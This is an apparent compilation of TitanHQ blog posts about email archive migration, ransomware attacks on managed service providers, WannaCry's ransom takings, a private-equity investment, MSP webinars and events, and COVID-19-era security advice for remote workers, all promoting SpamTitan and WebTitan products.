TitanHQ is in the process of migrating ArcTitan customers to the new system and the process will be completed with minimal customer effort. First, TitanHQ will create a new account on the new infrastructure. Once the new account has been set up, TitanHQ will be in touch to provide the details and talk you through making a simple change to your connector/mail server to point it to the new server. Once that change has been made, all archived email will be sent to the new archive and the old account will receive no further archived emails. Once TitanHQ has verified mail flow, you will be told that the process has been completed.
TitanHQ will then commence the migration of your archive to the new account. Once that process has been completed, you will be contacted and asked to verify the data migration. Once confirmation has been received, the old archive on the original server will be deleted.
There will be a small delay between sending email to the new account and migrating your historical email data, but customers will not lose access to the old archive. Searches can still be performed on the old archive and you will retain full access to all of your historical email data during the migration.
If you have any questions about the migration or the new ArcTitan email archiving systems, our customer service team will be more than happy to help.
Managed Service Providers are an attractive target for cybercriminals. If a threat actor succeeds in gaining access to an MSP’s network, they can use the same remote management tools that MSPs use to conduct attacks on the MSPs clients.
Many companies are now turning to MSPs for IT support and management services. This is often the most cost-effective solution, especially when companies lack the in-house IT expertise to manage their networks, applications, and security. An MSP will typically provide IT management services for many different companies. A successful cyberattack on the MSP can therefore give a threat actor access to the networks of all the MSPs clients, which makes the attack extremely profitable.
There was a marked increase in cyberattacks on managed service providers in 2019, in particular by ransomware gangs using GandCrab, Sodinokibi BitPaymer and Ryuk ransomware. The MSPs were attacked in a variety of ways, including phishing, brute force attacks on RDP, and exploitation of unpatched vulnerabilities.
Once access has been gained to an MSP’s network, hackers search for remote management tools such as Webroot SecureAnywhere and ConnectWise which the MSP uses to access its clients’ networks to provide IT services. Several 2019 ransomware attacks on MSPs used these tools to access clients’ networks and deploy ransomware. MSPs such as PerCSoft, TrialWorks, BillTrust, MetroList, CloudJumper, and IT by Design were all attacked in 2019 and ransomware was deployed on their and their clients’ networks.
Kyle Hanslovan, CEO at Huntress Labs, told ZDNet in a recent telephone interview that his company had provided support to 63 MSPs that had been attacked in 2019 but believes the total number of attacks was likely to be more than 100. However, the number of MSPs that have been attacked is likely to be substantially higher. It is likely that many cyberattacks on MSPs are not even detected.
The attacks have shown no sign of slowing. Recently the U.S. Secret Service issued a TLP Green alert warning MSPs of an increase in targeted cyberattacks. Compromised MSPs have been used to conduct business email compromise (BEC) attacks to get payments sent to attacker-controlled accounts. Attacks have been conducted on point-of-sale (POS) systems and malware has been deployed that intercepts and exfiltrates credit card data, and there have been many successful ransomware attacks.
In addition to cybercriminals, nation state-sponsored hacking groups have also been conducting cyberattacks on MSPs, notably hacking groups linked to China. The National Cybersecurity and Communications Integration Center (NCCIC) issued an alert about the threat to MSPs from state-sponsored hacking groups in October 2019.
Best Practices for MSPs to Adopt to Improve Their Security Posture
There are several best practices that can be adopted by MSPs to improve security and block these attacks. MSPs may currently be incredibly busy helping their clients deal with IT issues related to the COVID-19 pandemic, but given the increase in targeted cyberattacks on MSPs, time should be spent improving their own security, not just security for their clients.
The U.S Secret Service recommends MSPs keep up to date on patching, especially patches for any remote administration tools they use. ConnectWise issued a security advisory last month and patched a flaw in the ConnectWise Automate solution. The API vulnerability could be exploited remotely by a threat actor to execute commands and/or modifications within an individual Automate instance. Vulnerabilities such as these are actively sought by cybercriminals.
The principle of least privilege should be adopted for access to resources to limit the harm caused in the event of a breach. It is also important to have well-defined security controls that are fully compliant with industry standards.
Annual data audits should be conducted along with regular scans to identify malware that may have been installed on systems. Logging should be enabled, and logs should be regularly checked to identify potentially malicious activity. MSPs should also ensure that their employees receive regular security awareness training to teach cybersecurity best practices and how to identify phishing and BEC scams.
The WannaCry ransomware attacks that started on May 12, 2017 were blocked quickly when a kill switch was identified and activated, but how much money did WannaCry make during the time it was active?
WannaCry was a devastating global cyberattack, the likes of which had been predicted by many cybersecurity professionals but had yet to materialize. WannaCry was the fastest spreading ransomware ever created.
WannaCry combined ransomware with a worm, which allowed it to automatically spread and infect huge numbers of devices on a network. The ransomware exploited a vulnerability in Windows Server Message Block (SMBv1) using an NSA exploit called EternalBlue.
The flaw exploited by EternalBlue had been reported to Microsoft and a patch was issued in March 2017, two months before the attacks started. However, many businesses were slow to apply the patch and were vulnerable to attack. Within a matter of hours, around 200,000 computers had been attacked in 150 countries. It is worth noting here that there are still many computers that have not been patched more than 2 and a half years after the patch was released, in spite of widespread news coverage about the threat of attack and its huge cost. WannaCry is still one of the biggest ransomware threats and accounts for a significant percentage of all successful ransomware attacks in 2019.
WannaCry was blocked by a British security researcher who discovered the ransomware checked a domain name prior to encrypting data, but that domain name had not been registered. He purchased the domain name, thus preventing file encryption.
That said, the speed at which the ransomware spread meant many devices were infected and encrypted. Since businesses were not protected if the ransomware encryption had already started by the time the kill switch was activated, the attackers must have had a huge payday. So how much did WannaCry make?
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
By today’s standards, the ransom demand was very small. Just $300 per infected device, which doubled to $600 if the payment was not paid within 3 days. It is actually easy to see how many payments were made, as the transactions are detailed in the blockchain. The recipient remains anonymous, but the payments can be seen.
The three Bitcoin addresses known to have been used in the WannaCry attacks currently show 430 payments have been made and 54.43228033 BTC has been sent to those accounts. The value of BTC is somewhat volatile and was much higher at points between now and the attacks, but at today’s exchange rate that equates to around $386,905. Most of the BTC payments have now been moved out of the accounts so the attackers have managed to cash out. Payments are also still being made to those accounts. The latest payments to one of the addresses were made in December 2019.
$386,905 may not seem like much of a payday considering the number of devices infected and the damage caused by the attack, and it’s not. Further, the attackers will need to convert that total to real money, and a considerable amount will be lost in that process. The payday was tiny considering the scale of the attack. However, the cost of the attack to businesses was colossal.
The National Health Service in the United Kingdom was hit bad and the cleanup operation, and loss of business while that occurred, has been estimated to have cost £92 million. That was just one victim, albeit a major one. The total cost of the 2017 WannaCry ransomware attacks has been estimated to be $4 billion globally; however, even though the kill switch was flicked to block the initial attacks, the threat from Wannacry has not gone away. In 2019, two years after the initial attacks, millions of computers were still at risk as the vulnerability that was exploited had still not been fixed and a new version of WannaCry was released that did not have the kill switch and continues to pose a threat. In 2019 Kaspersky said it was the most detected ransomware threat with the ransomware infecting 164,433 users, accounting for 21 percent of detected ransomware attacks that year and ESET reports that WannaCry was the most commonly detected ransomware threat in Q1, 2020, 3 years after the ransomware first appeared. The ransomware is still being used in attacks on unpatched systems in Thailand, Turkey, and Indonesia.
Next time you delay applying a patch or updating software, consider WannaCry and the potential costs of exploitation of a vulnerability. In all of the above cases – all 200,000+ attacks – applying the patch would have prevented the attack and the huge cost of remediation.
TitanHQ is pleased to announce the UK-based mid-market private equity firm Livingbridge has invested in TitanHQ through its Enterprise 3 fund.
Livingbridge invests in fast growing companies valued up to 200 million. The Enterprise 3 fund is used to invest in companies with an enterprise value of up to £50 million. Livingbridge identified TitanHQ as an ideal company for investment, being uniquely positioned with a well-differentiated product portfolio, operating in an attractive market with strong macro tailwinds, and being a leader in the sector with a proven track record for delivering robust, easy to use, effective, and much loved security solutions.
TitanHQ has been operating for 20 years during which time the company has collected many awards for its email security, web filtering, and email archiving SaaS solutions – SpamTitan, WebTitan, and ArcTitan.
More than 8,500 businesses have chosen TitanHQ as a security partner and the company is hugely popular with managed service providers, with SpamTitan, WebTitan, and ArcTitan offered by more than 2,500 channel partners. SMBs, MSPs, and ISPs in more than 150 countries use TitanHQ solutions, including big name brands such as Pepsi, Virgin, O2, ViaSat, and Datto. The company has registered year on year growth and now has an ARR of more than $15 million.
“We are delighted to be partnering with TitanHQ,” said Livingbridge director, Nick Holder. “There is a tremendous opportunity for Titan HQ to accelerate its growth trajectory over the coming years and we look forward to working closely with the management team to fulfill the company’s potential. Their focus and dedication to the MSP community is completely aligned with our strategy.”
The partnership will help TitanHQ reach its full potential and further cement its position as the leading provider of cloud-based security solutions to MSPs serving the SMB market.
“We are excited to be taking this next step in our growth journey with Livingbridge, a partner that understands the unique strengths of our business, shares our vision for success and has the experience and resources to help us to achieve it,” said TitanHQ CEO, Ronan Kavanagh.
The global COVID-19 pandemic has forced businesses to make massive changes in a short period of time. Many managed service providers have demonstrated resilience and have weathered the storm and have shown that while we are now living in very uncertain times, there are opportunities for growth. Successful MSPs have not only adapted their business to ensure their survival, they have seized the opportunities and are gaining considerable growth momentum and have shown it is possible to thrive in spite of an extremely challenging economy.
At MVP GrowthFest on June 23, 2020 you will be able to find out how successful MSPs are turning adversity into growth and profit and will learn from an all-star line up of Channel experts about the state of the Channel and what you must do to adapt to these challenging times. You will also be provided with guidance on the steps you can take now to ensure success and grow your business and thrive.
MVP GrowthFest is a 3-hour virtual event that will provide valuable insights and advice that can be used immediately to help you grow your business. The event is being headlined by an interview with Earvin “Magic” Johnson Jr., the 3-time NBA MVP Award winner.
Matt Solomon, VP of Business Development at ID Agent, will be conducting the interview and Magic Johnson, who will explain how he succeeded by overcoming obstacles throughout his life, and how tenacity and commitment to the community were key to his success.
MVP GrowthFest will be celebrating the energy that powers growth and the drive to thrive during challenging times and, in addition to the interview, MSPs will hear from 15 Channel all-stars in four powerhouse panels.
TitanHQ is pleased to announce that Sales Director Conor Madden will be leading the panel in the security session titled “Leading with Security through Education.” The key to selling products in your security stack is to educate your clients about the need for cybersecurity. Given the fact that cyber actors have been attacking businesses with increased vigor during the pandemic, positioning your security stack front and central is the logical step.
TitanHQ can offer web and email security solutions that will not only protect you and your clients, they can be efficiently implemented into your security stack and can be easily packaged. Plus, an extremely competitive price point means they are affordable solutions for your clients and generous margins will help you boost your bottom line.
Conor will be joined on the security powerhouse by:
Jon Murchison – CEO, BlackPoint Cyber
Kevin Lancaster – CEO, ID Agent & GM Security, Kaseya
Jessvin Thomas – President & CTO, SKOUT
Attendees will also get to hear from Channel leaders in three further Powerhouse sessions that will provide invaluable advice on how to grow your business and boost profits during these challenging times.
Managing Through Change
Dan Wensley – CEO, Warranty Master
Joe Alapat – CEO & Founder, Liongard
Ryan Walsh – Chief Channel Officer, Pax8
Establishing Trust in the New Normal
Dave Goldie – Vice President of Channel, Cytracom
Ted Roller – Channel Chief, ConnectBooster
Andra Hedden – CMO, Marketopia
Frank DeBenedetto – Founder, AudIT
Leading & Accelerating through the Recovery
Tim Conkle – Founder, The 20
Dennis O’Connell – Vice President, Taylor Business Group
If you have been following the security news, you will have seen that there has been a major increase in COVID-19 themed cyberattacks targeting remote workers. Cybercriminals are exploiting fear about the virus and the somewhat chaotic switch from mostly office-based workers to having virtually the entire workforce working remotely. Understandably given the speed at which businesses have had to adjust, vulnerabilities have been introduced.
The attack surface has increased considerably as a result of largely at-home workforces and cybercriminals have taken advantage. According to research conducted by Darktrace, in the United Kingdom, prior to the COVID-19 lockdown being imposed, around 12% of malicious email traffic was targeting home workers. The volume increased to around 60% after 6 weeks of lockdown, which clearly demonstrates the extent to which remote workers are being targeted.
The types of malicious emails being sent to remote workers have been incredibly diverse. Cybercriminals are using all manner of lures to get remote workers to click links and disclose their credentials or open malicious attachments and trigger malware downloads. Financial fraud has also increased with BEC gangs using the COVID-19 pandemic to fraudulently obtain funds from company accounts.
Early on in the pandemic when information about the virus was thin on the ground, emails were being sent offering important advice about preventing infection along with fake updates on cases. As the pandemic progressed and the effects started to be felt, cybercriminals started sending fake requests for donations to charities to help individuals adversely affected by COVID-19. As governments implemented furlough schemes and set up funds to help the employed and self-employed, campaigns were conducted that linked to websites that claimed to offer grants, allow workers to choose to be furloughed, or apply for financial support.
Attacks have targeted the tools that are being used by remote workers to connect to their offices and communicate with colleagues, with the likes of Zoom, Skype, GoToMeeting, and other corporate messaging systems being spoofed to infect users with malware. File sharing platforms have similarly been spoofed to get employees to disclose their credentials. Darktrace’s data shows there has been a massive increase in spoofing attacks during lockdown, increasing from around one fifth of attacks before lockdown to 60%.
It is not only cybercrime groups that are conducting attacks. State-sponsored hacking groups have similarly been taking advantage of the pandemic to steal sensitive data, including the latest COVID-19 research data on potential cures, vaccines, and treatments to further the response efforts in their own countries.
What is not always clear from the new reports is how the increase in cyberattacks targeting remote workers has translated into actual data breaches. Are these attacks succeeding or are companies managing to thwart the attacks and keep the hackers at bay?
There is a lag between intrusions being detected, breaches being confirmed, and announcements being made but it appears that many of these attacks are succeeding. In April, the International Association of IT Asset Managers issued a warning that while a rise in data breaches was to be expected as a result of the pandemic, the number of incidents was actually far higher than anticipated. It is also clear that ransomware attackers have stepped up their efforts to attack businesses. Even organizations on the frontline in the fight against COVID-19 have not been spared.
Threat actors have taken advantage of the opportunities offered by the pandemic. It is up to businesses to make sure their security measures are sufficient to thwart attacks. Combating cyberattacks on remote workers requires additional security measures to be implemented. One measure that is often overlooked but can greatly improve protection is DNS filtering.
A DNS filter provides protection against the web-based component of cyberattacks and is an important measure to implement to improve defenses against phishing and malware. Even with robust email security defenses in place, some messages will arrive in inboxes. A DNS filter provides an extra layer of protection by preventing users from visiting malicious websites linked in emails.
When a malicious link is clicked, a DNS query is made, and a DNS lookup is performed to find the IP address of the URL. DNS filtering ensures that the IP address is not returned if the URL is malicious. A DNS filter such as WebTitan also allows IT teams to block malware downloads, monitor internet activity, and carefully control the types of websites their remote users can access on corporate devices.
If you have not yet implemented a DNS filtering solution and would like more information on how it can protect against cyberattacks on remote workers, give the TitanHQ team a call today.
Cybersecurity for remote workers has never been so important. At-home employees are being targeted by hackers who see them as low hanging fruit and an easy entry point into corporate networks.
The threat faced by businesses that have rapidly shifted to a largely at-home workforce should not be underestimated. With everyone working in the office, within the protection of the corporate firewall, IT departments could keep hackers at bay. Any employees that were authorized to work from home could be provided with a laptop that had security protections appropriate for the increased level of risk.
Moving the entire workforce from the office to attics, basements, kitchens, and spare rooms in a very short space of time has meant corners have had to be cut. Many SMBs have had to adapt quickly and have not had enough time to provide additional training to their at-home employees. The laptop computers now being used by their employees have had to be provisioned quickly and they lack the protection required for at home working. Some businesses are even allowing personal computers to be used out of necessity. Cybercriminals have been rubbing their hands with glee at the new opportunities and the ease at which they can attack businesses.
Lockdowns are now being lifted and people are being encouraged to go back to work, but further spikes in cases are likely as a result and with social distancing in the office problematic for many businesses, many employees will still need to work from home. To reduce the risk of those employees falling for a phishing scam or inadvertently downloading malware or ransomware, additional cybersecurity measures should be implemented.
You will more than likely have an email security solution to block the most common attack vector, but additional layers of security will greatly improve your security posture, one of the most important of which is a web filtering solution. A web filter stops your employees from visiting malicious websites, such as those used for phishing or malware distribution. When an attempt is made to visit a malicious website – through a link in a phishing email, a web redirect, or general web browsing – rather than being allowed to visit the website, employees will be directed to a local block page that explains the site cannot be accessed as it violates your internet usage policies.
A web filter can also be used to stop employees from using their work laptop for personal use by blocking websites by category, and as a control against shadow IT to prevent unauthorized software downloads.
WebTitan Cloud will allow you to improve cybersecurity for remote workers without requiring any software downloads and can be set up and protecting your office staff and remote workers in a matter of minutes.
Join us for our Webinar on Improving Cybersecurity for Remote Workers
If you are reading this before Thursday May 21, 2020, then you can find out more about how WebTitan Cloud can protect your employees and corporate network from attack by joining us on for our webinar.
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
Date: Thursday, May 21, 2020
Time: 11:00-11:30 CDT
If you missed the webinar, just give us a call and we will be happy to answer any questions you have, explain the benefits of WebTitan Cloud, arrange a product demonstration, and help get you filtering the internet and blocking web-based threats.
TitanHQ is hosting a webinar on Thursday May 21, 2020 and will be explaining how you can double protection for your remote workers and better protect them against phishing, malware, ransomware, and zero-day attacks. The webinar is ideal for current SpamTitan customers, prospective customers, Managed Service Providers and small- to medium-sized enterprises.
During the webinar you’ll find out why it is so important to protect against both the email- and web-based components of cyberattacks and you will discover more about an important layer that you can ad to your security defenses that will allow you to significantly reduce susceptibility to a cyber attack and data breach.
TitanHQ will explain how cybercriminals are exploiting the COVID-19 pandemic and are targeting remote workers. You will also discover more about the features and security layers of WebTitan Security and how this DNS-based web filtering solution allows you to manage user security at multiple locations.
Most cyberattacks have an email and web-based component – Find out how WebTitan serves as a vital layer of security to block phishing attacks, malware and ransomware downloads.
Learn why WebTitan is the leading web security option for the Managed Service Provider who service the SMB and SME market.
Join TitanHQ for the webinar, which will be attended by:
Derek Higgins, Engineering Manger TitanHQ
Eddie Monaghan, Channel Manager TitanHQ
Marc Ludden, Strategic Alliance Manager TitanHQ
Kevin Hall, Senior Systems Engineer at Datapac
Title: Keeping your Remote Workers TWICE as secure with SpamTitan & WebTitan
The 2019 Novel Coronavirus pandemic has caused major disruption for many businesses, and while it is far from business as usual for many firms, work has been continuing by letting employees work from home but doing so opens a business up to new cybersecurity risks, some of the most important of which we have covered in our COVID-19 cybersecurity checklist.
Under normal circumstances, the risks from allowing workers to spend some of their working week at home can be effectively managed, but having virtually the entire workforce working remotely creates many cybersecurity challenges. Further, threat actors are exploiting the pandemic and are actively targeting remote workers.
COVID-19 Cybersecurity Checklist
To help you address the risks of remote working we have produced a quick reference COVID-19 cybersecurity checklist covering some of the most important aspects of cybersecurity that should be addressed, in light of the recent rise in cyberattacks on remote workers.
All remote employees should be using VPNs to access corporate systems, but VPNs can also introduce vulnerabilities. There has been an increase in attacks exploiting unpatched vulnerabilities in VPNs during the pandemic and scans are being performed to find vulnerable VPNs.
VPNs clients must be kept up to date and patches should be applied promptly. There have been several attacks reported recently that have exploited the Pulse Secure vulnerability CVE-2019-11510 to deliver ransomware, even though a patch was released to correct the flaw in April last year. Vulnerabilities in other VPNS have also been targeted.
You should also consider disabling split tunneling for VPN profiles to prevent employees from accessing the internet directly while they are connected to corporate information systems or should ensure all internet traffic is routed through the VPN. You should enable multi-factor authentication for VPNs and create a separate VPN zone in your firewall and apply security policies to protect incoming and outgoing traffic.
Remote Desktop Protocol
Many businesses rely on Remote Desktop Protocol (RDP) to allow their employees to connect remotely, but If you do not use RDP, you should disable port 3389. There has been a growing number of brute force attacks on RDP. A recent Kaspersky report showed brute force attacks on RDP increased. There was a major increase between January and February, with global attacks rising to 93,102,836. In April, attacks had increased to a staggering 326,896,999.
If you use RDP, make sure strong passwords are set, enable multi-factor authentication, and ensure connections are only possible through your VPN – Do not allow RDP connections from outside.
Communication and Collaboration Platforms
You will need to use some form of communication and collaboration platform, such as a videoconferencing solution, to allow workers to easily get in touch with colleagues. There are many choices available, but the security capabilities of each can vary considerably. Some solutions that were considered to be secure, such as Zoom, have been shown to have vulnerabilities, some of which have been exploited in attacks. The U.S. National Security Agency (NSA) has recently issued a useful checklist for selecting appropriate communication tools along with information on how they can be used securely.
With everyone at home, burglaries may be down, and lockdown have reduced the risk of loss and theft of mobile devices, but encryption is still important. All corporate owned mobile computing devices should have encryption enabled, which is straightforward for Windows devices by enabling BitLocker. You should also encrypt web applications and FTP to ensure any data that is uploaded or downloaded is encrypted.
Ensure Firewalls are Enabled
Your employees will be beyond the protection of the corporate firewall so they should have local firewalls enabled. The easiest and most cost-effective way of applying a local firewall is to use the Windows Defender firewall, which can be configured through your MDM solution or Group Policy.
The volume of phishing emails may not have increased by a very large degree during the COVID-19 lockdown, but there have been a large number of phishing related data breaches. Phishers have changed their campaigns and are now extensively using COVID-19 themed campaigns, which are proving to be very effective. People crave information about COVID-19 and are responding to COVID-19 themed phishing emails in large numbers. Many of the emails we have seen have been highly convincing, spoofing authorities such as WHO and the CDC.
You should consider adding an additional layer to your email defenses if you are only using Microsoft’s Exchange Online Protection (EOP). Many phishing emails are bypassing Microsoft’s defenses and are being delivered to inboxes. SpamTitan can be layered on top of Office 365 protections and will greatly improve the detection of phishing emails and zero-day malware and ransomware threats.
Multi-factor authentication for email accounts should be set up. In the event that email credentials are compromised, multi-factor authentication should prevent those credentials from being used to access accounts.
You should also set up a system that allows employees to report any suspicious emails they receive to the security team, to allow action to be taken to remove all similar messages from the email system and to tweak email security controls to block the threats.
With email security improved, you should also take steps to block web-based attacks. Malicious websites can be accessed by employees through general web browsing, redirects via malvertising, malicious links on social media networks, and links in phishing emails. A DNS filtering solution such as WebTitan Cloud prevents employees from visiting known malicious websites and will block drive-by malware downloads. WebTitan Cloud will protect employees whether they are on or off the network. If you don’t have web filtering capabilities for remote workers, ensure that internet access is only possible through your VPN to ensure bad packets are filtered out.
Cybersecurity Alerts and Log Checking
You should have systems in place that generate cybersecurity alerts automatically and you should enable security logs and regularly check them for signs of compromise. Monitor the use of PowerShell and red team tools such as Mimikatz and Cobalt Strike. These tools are often used by manual ransomware attackers to move laterally once access to networks is gained.
The COVID-19 pandemic has given cybercriminals a golden opportunity to make money. With the world focused on little else other than the response to the pandemic, and with people craving information about the virus, it is not surprising that standard phishing lures have been abandoned in favor of COVID-19 themed lures.
COVID-19 and coronavirus themed domains have been purchased in the tens of thousands and are being used for phishing, malware distribution, and a variety of scams such as obtaining donations to fake charities. Figures released by the Palo Alto Networks Unit 42 team for the period of February to March show there has been an average daily increase of new COVID-19 related domains of 656%, a 569% increase in the number of malicious COVID-19 domains, and a 788% increase in new high-risk domains.
Several domain registrars have started taking steps to combat coronavirus and COVID-19 related fraud and some, such as Namecheap, are now preventing the registration of new domains related to COVID-19. Domain registrars are flagging these new domains for investigation, but that is a manual review process that takes time. In the meantime, the domains are being set up and used for convincing scams.
One malicious campaign uncovered in the past few days uses COVID-19 themed domains to distribute the banking Trojan Grandoreiro. The websites are used to host videos that promise to provide important information about SARS-CoV-2 and COVID-19. When visitors click on the video, a file download is triggered and the user is required to run the installer to view the video content, but instead installs the banking Trojan. The banking Trojan has previously been delivered via spam email, but the threat group behind the malware have changed tactics in response to the pandemic and have changed to web-based delivery.
There have been many similar campaigns created using malicious COVID-19 domains to deliver a slew of malware variants such as keyloggers, information stealers, cryptocurrency miners, and other Trojans.
Lockdown has left people with a lot of time on their hands and outdoor activities have been swapped for more TV time. It is no surprise that movie piracy sites have seen a huge surge in traffic and malware distributors are taking advantage and are bundling malware with pirated video files and using fake movie torrents to deliver malware.
An investigation by Microsoft identified a campaign that uses a VBScript packaged into ZIP files that claim to be pirated movie files. The campaign was being conducted to deliver a coinminer that runs in the memory, with living-of-the-land binaries also used to download other malicious payloads.
These campaigns often have a phishing component, with emails sent to drive traffic to these malicious websites. An advanced spam filtering solution can help to block the email component of these campaigns, but businesses should also consider an additional layer to their security defenses to block the web-based component of these attacks and prevent their remote employees from visiting malicious COVID-19 domains. That protection can be provided by a DNS filtering solution such as WebTitan Cloud.
WebTitan Cloud filters out malicious websites at the DNS lookup stage of a web access request. When a user attempts to visit a website, instead of the standard DNS lookup to find the IP address of a website, the request is sent through WebTitan. If an attempt is made to visit a malicious domain, the request will be blocked and the user will be directed to a local block page. WebTitan can also be configured to block certain file downloads and filter the internet by category, such as blocking P2P file-sharing and torrents sites to provide additional protection against malware and the installation of shadow IT.
WebTitan Cloud can be quickly set up remotely by sysadmins to protect all workers on and off the network with no clients required, which makes it an ideal solution during the COVID-19 pandemic for protecting remote workers.
For further information on protecting your organization and remote employees from web-based attacks, to register for a free trial of WebTitan, and for details of pricing, give the TitanHQ team a call today.
There has been a massive rise in the number of telecommuting workers as a result of the 2019 Novel Coronavirus pandemic and cybercriminals are taking advantage. Phishing and malware attacks have soared in the past few weeks and home workers are being targeted.
Individuals who regularly worked from home before the COVID-19 crisis will be used to taking precautions when connecting to virtual environments set up by their employers, but huge numbers of employees are now logging in remotely for the very first time and may not be aware of the telecommuting cybersecurity risks. IT and IT security departments have also had to set up the workforce for home working in a hurry, and the sheer number of employees that have been forced into telecommuting means corners have had to be cut which has created opportunities for cybercriminals.
Even if the transition to having the entire workforce telecommuting has been expertly managed, risk will have increased considerably. Cybersecurity is far harder to manage when the entire workforce is outside the protection of the corporate firewall and with most workers telecommuting, the attack surface has grown considerably.
Telecommuting workers are seen as low hanging fruit and cybercriminals are taking advantage of the ease at which attacks can be conducted. Since January there has been a massive increase in phishing attacks, malware attacks, and attacks over the internet targeting remote workers.
NASA Sees “Exponential Increase” in Malware Attacks
On April 6, 2020, NASA sent a memo to all personnel warning of a massive increase in targeted attacks on the agency. NASA explained in the memo that the number of phishing attempts on NASA employees has doubled in the past few days and its systems designed to block employees from accessing malicious websites has gone into overdrive. The number of malicious websites that are now being blocked has also doubled, which strongly suggests employees are clicking on links in phishing emails and are being fooled by these scams. NASA also reports that there has been an “exponential increase in malware attacks on NASA systems.”
Attacks are being conducted by a diverse range of threat actors, from small players to prolific advanced persistent threat (APT) groups and nation-state sponsored hackers. NASA has warned its employees that those attackers are targeting NASA employees’ work and personal devices and that the attacks are likely to continue to increase throughout the Novel Coronavirus pandemic.
NASA is far from alone in experiencing a massive increase in attempted cyberattacks. Businesses of all sizes are now having to deal with unprecedented risks and are struggling to defend their networks from attack. They now have to defend a massively increased attack surface and the number of attacks has skyrocketed.
There are other factors that are making it difficult for employers. Employees crave information about the Novel Coronavirus and COVID-19 and cybercriminals are sending huge numbers of emails offering them just the information they seek. Huge numbers of websites are being set up that purport to offer advice on the Novel Coronavirus and COVID-19. Check Point has reported that more than 16,000 domains related to coronavirus or COVID-19 have been registered since January and those domains are 50% more likely to be malicious than other domains registered in the same period.
How to Protect Telecommuting Workers
There are three main ways that telecommuting workers are being attacked: Email, malicious websites, and the exploitation of vulnerabilities.
To prevent the latter, it is essential for software and operating systems to be kept up to date. This can be a challenge for IT departments at the best of times, but much harder when everyone is working remotely. Despite the difficulty, prompt patching is essential. Vulnerabilities in VPNs are being targeted by cybercriminals and offer an easy way to gain access to corporate networks. Employees should be told to make sure their VPN clients are running the latest software version and businesses should ensure their VPN infrastructure is kept up to date, even if it means some downtime while updates are applied.
TitanHQ Can Help You Strengthen Email and Web Security
Advanced email security defenses are now required to protect against phishing and email-based malware threats. Some of the COVID-19 phishing campaigns that are now being conducted include some of the most sophisticated phishing threats we have ever seen.
You should not rely on one form of email security, such as Microsoft’s Exchange Online Protection for Office 365 accounts. Layered defenses are essential. Office 365 email security can be significantly strengthened by layering SpamTitan on top of Microsoft’s EOP protections. SpamTitan does not replace Office 365 protections, it improves them.
SpamTitan is an advanced email security solution that incorporates powerful, real time updated AI-driven threat intelligence to block spam, phishing, malware, malicious links, and other email threats from incoming mail. SpamTitan sandboxing identifies threats that signature-based detection solutions miss and is effective at identifying and blocking zero-day malware threats.
Each day, the number of malicious websites related to COVID-19 grows. These websites are used to phish for sensitive information such as email and VPN credentials and for drive-by downloads of malware. To protect remote workers and prevent them from accessing these malicious websites, a web filtering solution is required.
WebTitan DNS Security offers protection against web-based threats and prevents employees from accessing known malicious websites. WebTitan DNS Security is seeing massively increased traffic demand for its scanning and web detection features, but the solution is cloud based and has been developed with scalability in mind. WebTitan DNS Security is blocking new threats as soon as they are identified to keep customers and their employees protected. The solution can be easily implemented to protect remote workers but inserting simple code into enterprise devices which points the DNS to WebTitan. That small change will ensure the internet is filtered for all employees, no matter where they are working.
TitanHQ is committed to providing safe and secure email and internet usage for our customers, partners and their users, now more than ever. Contact TitanHQ today for help improving security at your organization.
Blackpoint Cyber announced its Remote Reality LIVE conference, which will occur online April 8th and April 9th 2020.
The conference will focus on managed service providers (MSPs) and how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business veterans from the MSP services and technology industry.
Blackpoint Cyber announces its virtual cyber security conference for MSPs – Remote Reality LIVE. Featuring a keynote from the former Acting Director of the CIA and sessions from tech giants Datto, Webroot, Marketopia, and more.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, explains the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has partnered with leading technology, service, and marketing firms for the conference, including:
Datto: leading global provider of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will present the keynote session on national security implications of the Coronavirus outbreak. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Additional former US government cyber security and intelligence expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP industry leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, shares his sentiments on the conference: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also be eligible for giveaways and prizes.
IT departments have been forced to address cybersecurity risks with remote workers in a hurry due to the 2019 Novel Coronavirus pandemic that has seen large sections of the workforce forced into working from home.
The International Workplace Group conducted a study in 2019 and found that 50% of employees spend at least half of the week working remotely, and 70% of workers spend at least one day each week working from home. The 2019 Novel Coronavirus pandemic has increased that percentage considerably. Many companies have all but closed down their offices and have told their employees they must work from home.
While this is an important strategy for ensuring the safety of the workforce, there are many cybersecurity risks with remote workers and IT departments will find it much harder to secure their systems, protect confidential data, and quickly respond to security incidents.
One of the biggest problems for IT departments is the speed at which changes had to be made to accommodate a massive increase in remote workers. There has been little time to prepare properly, provide training, and ensure the cybersecurity risks with remote workers are all addressed.
Cybercriminals are Targeting Remote Workers
